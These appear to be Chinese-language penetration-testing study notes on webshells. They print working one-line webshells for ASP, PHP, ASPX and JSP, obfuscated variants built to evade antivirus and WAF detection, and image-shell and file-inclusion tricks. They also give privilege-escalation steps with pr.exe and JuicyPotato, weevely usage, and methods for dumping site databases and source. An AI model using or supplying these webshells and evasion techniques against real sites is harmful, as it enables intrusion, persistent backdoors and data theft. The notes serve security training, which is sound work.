15.脚本的使用

1.WEBSHELL 类型
2.WEBSHELL 工作原理
3.一句话常见的客户端
4.shell常用免杀技巧
5.后门各种踩法
6.源码打包
7.数据获取

PART 1: WEBSHELL 类型
webshell的种类
一句话木马
小马
大马
打包马
脱裤马
等等

拿到webshell:
可以对网站源码任意修改
前提有修改权限
拿到一个网站的webshell只能对这一个网站的内容有读写，服务器其他网站是没法读写的，除非管理员分配权限错误

如果：一句话只上传到xx.com/uploafile/x.asp //
却没法上传到xx.com/dama.asp //没法上传到根目录里，是权限问题。

webshell权限取决与你拿到容器运行的权限
容器：
IIS ---网络服务员用户
apache ---apache用户
//如果服务器是iis搭建的，而你此刻拿到的全是是容器IIS的网络服务用户权限

运用仅有的普通用户权限，取提升至system权限，这个过程叫''提权''
提权的目的是system权限可以控制服务器下更多的网站

PART 2: WEBSHELL 工作原理
一句话木马
<%execute request("value")%>
//一句胡本身作用不大，但在接收和传参的数据脚本联合起来作用就很大，例如菜刀
优势：简短，易赢藏，容易免杀

免杀问题；
safedog
d盾
云锁
360
阿里云防护
//你上传一句话后，这些会把你的一句话秒删掉，就需要baypass绕过

baypass
通过修改或者编码让一句话扭曲，让杀毒的渣渣们不识别他，就绕过了


黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：
<%execute request("value")%>
其中value是值，所以你可以更改自己的值，前面的request就是获取这个值
<%eval request("value")%>(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)
当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。）
这就被称为一句话木马，它是基于B/S结构的。

注意：
//一句话插入进去是空白的，如果显示出来了就证明他被当做字符处理了，也就失效了
//asp脚本只能解析asp一句话
//xx.jpg不能被解析，除非有对应的中间件解析漏洞。 nginx,iis6.0，windows2003等等

常见写法
asp一句话木马：
<%eval request("c")%>
php一句话木马：
<?php @eval($_POST[value]);?>
aspx一句话木马：
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
jsp一句话
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

注意：
默认asp站点可不可以上传php一句话？
可以，前提是iis容器是建站商搭建的，
建站商搭建的会支持：asp/aspx/php
容器支持其他脚本类型，也可以上传其他脚本木马

一句话的使用
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库，或者加进asp网页.
记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

data里是mdb数据库文件，有的管理员把后缀改成asp，这时候就可以通过前台写进shell然后用菜刀链接

小马
小马体积小，容易隐藏，隐蔽性强，最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行，不过功能少，一般只有上传等功能。
实例：
1.打开webshell中国菜刀文件夹里脚本木马/asp脚本找到x.asp，粘贴到环境根目录里，看好权限分配否则会弹框500，在链接.
2.出现两个弹框，复制路径当下路径重新改名C:\inetpub\sql_inject\access注入w78\xx.asp ，再把ASP大马的代码放到第二个框里，生成，连接即可。

大马：
用途：
提权
打包
脱裤
增删文件
等等

大马的作用分三个模块
1.查看文件的模块
2.功能模块
3.显示模块

爆破shell
//在网站找到别人的shell可以使用。
工具：
密码破解--shell爆破--webshell爆破--打开放入直接连接webshell的URL--载入字典--打开--开始爆破

清理木马的方式：
原理，大马都有自己的隐藏方法。
我在根目录上传了大马，却打开服务器里找不到。
解决方法：
找到根目录打开cmd进入目录
1.cd C:\inetpub\sql_inject\access注入w78
2.C:\inetpub\sql_inject\access注入w78:dir /a //显示出所有
3.C:\inetpub\sql_inject\access注入w78:type xx.asp //查看详细内容
删除方法：无法直接删除，要么替换要么进入马里解锁权限在删除
4.在桌面创建xx.asp的文件替换掉根目录的xx.asp
5.或者爆破大马进入有个解锁本程序，解锁后再删除。

黑客锁定方法：
//被挂黑页管理员却找不到是因为大马把主页文件锁定了
例如：index.asp
大马里：解锁本程序--锁定右键检查---

PART 3: 一句话常见的客户端
一句话最常用的客户端为：
一句话客户端增强版
中国菜刀
中国砍刀
蚁剑，c刀，冰蝎
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
webacoo //kali
weveely //kali
msf 生成的aspx、asp、php、jsp、各种payload

首先用之前的大马新建文本写入一句话进去。在访问一下。
http://192.168.9.70:9002/yijuhua.asp //插入的一句话

菜刀2016：
注意：要写http,密码，脚本类型，GB2312windows，添加
注意：php5.2.17的版本2016菜刀无法连接，因为2016无法绕过魔术引号，使用过狗狗菜刀链接

功能点一：读写文件

上传注意：
上传大马，最好新建文件粘贴大马代码。 //也就是直接在菜刀新建文件，保存asp格式即可

绕过检测去躲避WAF
方法一：
包含文件：
1.大马变成jpg文件上传上去
2.新建文件改名n.asp
3.<!--#include file="ima.jpg"--> //这是asp的文件包含代码，同级就不用写路径了
4.在去访问n.asp

方法二：
多级包含
a.asp包含b.asp。
b.asp包含c.asp。
c.asp包含ima.jpg

功能点二：数据库管理
mysql数据库只需要写账号密码即可
access数据库得填写路径以及文件名称//<C>Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\inetpub\sql_inject\access注入w78\data\#sze7xiaohu.mdb</C>
执行sql语句管理每个表的数据

功能点三：虚拟终端
whoami //查看是否有权限访问
如果没有。
解决方法：上传cmd
工具：windows--权限提升--cmd命令---cmd.exe上传到根目录
打开终端setp 粘贴路径 //setp指定调用的路径
这个权限是iis容器的权限

接着执行；最简单的提权
systeminfo//查看有没有打补丁
没有打补丁就提权：
溢出提权-pr
工具：权限提升--windows--溢出提权--pr---pr.exe--上传 //写入失败就更新缓存
setp C:\inetpub\sql_inject\access注入w78\cmd.exe
C:\inetpub\sql_inject\access注入w78\pr.exe
C:\inetpub\sql_inject\access注入w78\pr.exe ''whoami''//在次查看，系统提权成功

JuicyPotato提权烂土豆
上传烂土豆去到根目录
打开终端指定cmd运行
运行烂土豆
JuicyPotato.exe -p "whoami" //获得管理员权限

冰蝎2.0
冰蝎客户端马也只能用冰蝎的马，因为冰蝎的马是加密过的
访问网站一句话--复制路径--粘贴冰蝎--输入密码
功能一：上传下载
功能二：反弹shell msf
设置ng若克的地址以及端口即可
功能三：可以做到免杀

kali里面的
weevely
高隐蔽性的针对php平台的webshell工具
本身提供了30多种自动化扫描工具
可以执行多种任务
浏览文件系统，检测服务器设置，创建tcpshell和reverse shell,在
被测主机上安装http代理，执行端口扫描

weevely --help
生成shell
weevely generate 123123 shell.php
连接 shell
weevelly htpp://127.0.0.1/shell.php 123123
net.scan 127.0.0.1 20,22,23,8080,3389 扫描指定ip端口

实例；
生成方法
wwebely generate 123123 /root/cc.php //本地生成的cc.php密码是123123

访问：
weevely http://127.0.0.1/cc.php 123123

:help //查看帮助
:shell_sh //远程执行命令 进入cmd界面
多看看

工具有基于py制作的随机免杀一句马，复制代码放到php里即可

PART 4: WEBSHELL 免杀技巧

内容编码
制作图片马
配合解析漏洞
配合文件包含

内容编码
<?php $_REQUEST['a']($_REQUEST['b']); ?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>
<?php ($_=@$_GET[2]).@$_($_POST[sz])?>
<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?>
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?>
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?>
在菜刀里写http://localhost:8081/test/a.php?2=assert密码是sz

B374K团队写的马可以免杀

404隐藏后门

一句话图片马的制作
注意事项：1.需要完整的图片 2.图片代码尽量不要太大 3.最好不要做两用马 4.可以burp直接添加
C32下做一句话 //工具代码审计里
打开c32，把图片放里面，写入一句话保存。。退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片，在属性->详细信息->版权内插入一句话即可

配合解析漏洞
上传图片格式配置解析漏洞拿shell

/x.asp/x.jpg
x.cer
x.asa
x.php.xxx
x.jpg/.php

利用文件包含拿shell
将大马保存为2.jpg
将文件包含代码保存为x.asp
内容：
<!--#include file="2.jpg"-->
一并上传到同目录下，访问x.asp即可。
php包含代码如下，使用方法相同。
<?=include '2.jpg'?>
保存为x.php

有些waf不仅检测后缀，还检测你上传的内容
//检测内容，如果检测文本里有<?php 头部信息就会把直接拦截
这时候就要用到php的4种写法
写法1：<% %>
写法2：<? ?> //一般这种就可过了<?=include''x.jpg''?>
写法3：<?php ?>
写法4：<script lanuage=''php''></script>

PART 5: WEBSHELL 各种踩法

找shell后门
查找后门：
查找webshell后门
找到后门地址
反搞webshell箱子

webshell查找后门：
上传大马的时候打开审查元素,打开网络
大马制作着会把ip地址和密码发送到指定的服务器
例如192.168.9.70:9002/xx.asp&p=fuck123.com'> 小心
也有可能触发按钮传输

菜刀的后门需要用工具:嗅探侦听---WSExplorer_V1.3_XiTongZhiJia(抓包工具),去分析,解码才知道后门

或者host文件,解析把原地址改为1.1.1.1即可

给大马留后门
利用xss平台给大马留后门
用xss平台把cookie编码加密传输进去即可

webshell密码爆破
一句话密码爆破工具使用

webshell大马工具爆破

2.asp?profile=a

密码管破解,一句话爆破即可
空白的页面大多数是一句话之类的

PART 6: 源码打包

命令行调用 RAR 打包：
rar a -k -r -s -m3 c:\1.rar c:\folder
用途：打包源码 打包任意文件（数据库）
注意：rar文件路径 符号问题（"\"）

各种（asp/aspx/php/）打包马的使用

实例:asp打包
大马里有打包的地方,打包出来后是mdb的文件在根目录里
03的服务器可以下载.08,2016之类的服务器无法下载
解决方法：把后缀改为rar或者zip后缀就可以下载了
解包:需要在原级目录里,用一个大马去解包

实例:php打包
工具:webshell\大马\php\php打包马\phpmyzip.php
上传上去,然后网站打开,如果保存在本地路径,就直接删除保存路径即可
如果文件很大要分批打包

PART 7: 数据获取

数据获取测试
常见网站数据库类型
Access、sqlserver、mysql、oracle、

数据库允许外部地址链接
上传数据库管理脚本
使用数据库远程管理软件（nvcat、sqlserver连接器等）

数据库不允许外部地址链接
上传数据库管理脚本
sqlmap
burp
中国菜刀数据库管理

ACCESS基本打包源码时候就会拿到了
mysql脱裤:工具-webshell\大马\php\免杀\tuo.php.上传上去
sqlserver:下载adminer
oracle:下载adminer //数据库192.168.194.5:8003/xycom 有区别的
注意:阿里云库就得把adminer上传到目标服务器绑定的地址去脱裤才行

服务器地址可以写本地,也可以写远程